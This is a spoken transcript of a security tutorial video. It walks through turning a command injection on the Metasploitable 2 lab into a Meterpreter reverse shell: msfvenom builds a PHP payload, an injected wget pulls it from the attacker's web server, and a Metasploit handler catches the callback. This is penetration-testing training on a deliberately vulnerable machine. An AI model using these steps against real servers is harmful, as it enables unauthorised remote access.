Hello all, welcome to Hack of the Day Part 7. So I'm really trying to create at least a video a day, but I keep traveling doing a bunch of other stuff. So apologies if I miss one of the days. But keep the comments coming because that is what motivates me, right? Okay, so in this video, I decided to do something different, right? And probably some of you have already done this, but if you haven't, this is actually an interesting hack, which is how to get from a web application command injection to having a Meterpreter shell on the box. So what is my setup? I have backtrack and I am running Metasploitable, right? Metasploitable 2 to be exact. Now, if you go to Metasploitable 2 and let's use Meterpreter, and if you actually go to OS top 10, you want injection, you have command injection, and this is basically a simple DNS lookup, but it allows for command injection, which basically means I could just do an ls, and there you go. I can see a listing. Basically, I can run any command I like on the system, right? Now, how do you convert this command injection into something where we can actually get a shell on the box? So one of the ways is to upload a PHP script and then to run it. And that PHP script actually gives us a shell on the box. Now, many of you have used PHP shells, and I think there's a directory in Backtrack where you also have a bunch of web shells. So how do you do this with Metasploit is all I'm going to look at in this video. Now, if you use MSF Venom and list all the payloads, you'd actually find there are PHP Meterpreter payloads, which is what we'll use. As always, Metasploit takes its sweet time. Okay, so if you can quickly scroll up. So you have different PHP shells in here. So I'm going to use the PHP Meterpreter _TCP, right, payload. And with MSF Venom, this is actually quite simple. All I basically have to do is MSF Venom. I select the specific payload with P. Meterpreter reverse TCP. With reverse TCP, you always need an L host. So the attacker machine IP address is 1.10. Format is raw, and let's dump this into /temp. What do we call this? Let's call this mp.php. Right, this would take a bit. Let's go to the temp folder. Now, the question arises, how do we transport mp.php to the web server which has the vulnerable command injection script on it? Now, again, this is exactly a very straightforward technique using some way by which you can download. The most common is wget. So here is how the string would look like. If I would kind of just write it here, wget http, and I'm going to give the attacker IP address. Now let's assume that the attacker is running a web server on port 8000, and basically mp.php is in the root folder. This is exactly what we would need to fetch, right? So let me copy this out. Now, the simplest way to go ahead and run a web server is to use Python. And if you notice, we have invoked a web server in here. Let's go back in there, paste this, click lookup DNS. Now, before you do this and before I forget, right, there is one small thing you would need to keep in mind. Now, Metasploit actually adds a little guard here, the hash, so that this doesn't get interpreted. You need to remove this from mp.php, right? If you don't, it'll just be interpreted as a text file and shown to you on the screen. Now let's go back in here. Let me click lookup DNS. And if you notice, the command seems to be running here. And the easiest way to figure out is to go back here, and we should have a get request for mp.php. There you go. And the get request returns in a 200, which means we have successfully served mp.php to the web request, right? You could quickly do an ls and locate mp.php. There it is. Now is the other part, right? Now mp.php contains a reverse TCP Meterpreter shell, which means we would need to set up Metasploit. I already have an MSF console up and running. Use exploit multi-handler. Set payload would be PHP Meterpreter reverse TCP. Set lhost 192.168.1.10. This is the attacker IP, and you hit exploit. We basically go back in here, and all we would need to do is hit mp.php in here. And if you go back here to Metasploit, if you notice, this is executed, and now we've broken into the web server. Fantastic. Right? Awesome. So this is how you can go from a simple command injection to a full-blown Meterpreter shell. Here is a little exercise for you. So we also have damn vulnerable web app installed in here. And this also has a command injection. So let's see who among you is going to post the very first video on SecurityTube demoing command injection in DVWA and getting a full-blown Meterpreter shell. Now, extra points if you probably use some other web shell like simple backdoor or anything else for that matter. So this is a good time to show off your web shells. No need for you to do audio or kind of the video of yourself the way I do it. You could just do a very simple demonstration, right? I'll leave that to you. So guys, that's all for this simple video. Hope you enjoyed it. And this free video is sponsored by SecurityTube Trainings. We have a bunch of fantastic courses: Python scripting, iOS expert, assembly language, Metasploit, wireless, and many, many more to come, right? So check us out at securitytube-training.com. Also, hack of the day is basically for the community. So if you have any other topics, anything interesting you'd like me to make videos on, post it here. If I'm aware of the topic, if I know a little bit about it, I'll try and make a video. That's all for this video. Thank you.